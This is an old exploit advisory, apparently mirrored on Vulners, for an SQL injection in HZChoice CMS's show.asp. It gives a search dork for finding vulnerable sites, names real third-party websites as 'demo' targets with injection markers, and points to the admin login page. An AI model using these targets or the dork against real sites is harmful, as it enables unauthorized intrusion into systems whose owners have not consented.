Lucene search
K

HZChoice CMS SQL Injection

🗓️ 22 Oct 2012 00:00:00Reported by Ashiyane Digital Security TeamType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 45 Views

HZChoice CMS SQL Vulnerability issue on show.as

Code
`=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- In The Name Of God -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
--------------------------------------------------------------------------------  
@ HZChoice CMS SQL Vulnerability  
--------------------------------------------------------------------------------  
--------------------------------------------------------------------------------  
# Name:HZChoice CMS SQL Vulnerability  
# Vendor: http://hzchoice.com/  
# Date: 2012-10-22  
# Author: Ashiyane Digital Security Team  
# Thanks to: 1337day.com,cxsecurity.com,packetstormsecurity.org  
# Home: www.ashiyane.org/forums/  
--------------------------------------------------------------------------------  
--------------------------------------------------------------------------------  
[+] Dork: intext:Designed by 263网建部 inurl:show.asp  
--------------------------------------------------------------------------------  
--------------------------------------------------------------------------------  
[+] Vulnerability ~>  
  
[+] Vulnerability: http://127.0.0.1/show.asp?id=[SQL]  
  
[+] Demo(s) :   
  
[+] http://www.chinadayangchem.com/show.asp?id=974'  
  
[+] http://www.china-ex.com/dqfb/show.asp?qkid=411'  
  
[+] http://home.slhs.tp.edu.tw/talking/bbs4/show.asp?repno=6976&page=110  
--------------------------------------------------------------------------------  
  
[+] Admin Page(s) : http://127.0.0.1/manage/login.asp  
  
===========================================================================  
@ Gr33tz:  
@ Ashiyane Members :  
@ Behrooz_Ice,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04  
@ Taghva,M3QD4D,PrinceOfHacking,Hidden-Hunter,Root3r,elvator,unique2world  
@ Gladiator,Encoder,mmilad200,n3me3iz,Classic,r3d.z0n3,injector,zend,milad-bushehr,HidDeEn  
  
And All Ashiyane Bug ResearcherS  
===========================================================================  
  
ASHIYANE DIGITAL SECURITY TEAM  
  
Persian Gulf F0r Ever  
  
WE LOVE IRAN  
  
<<./By MojiRider >>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation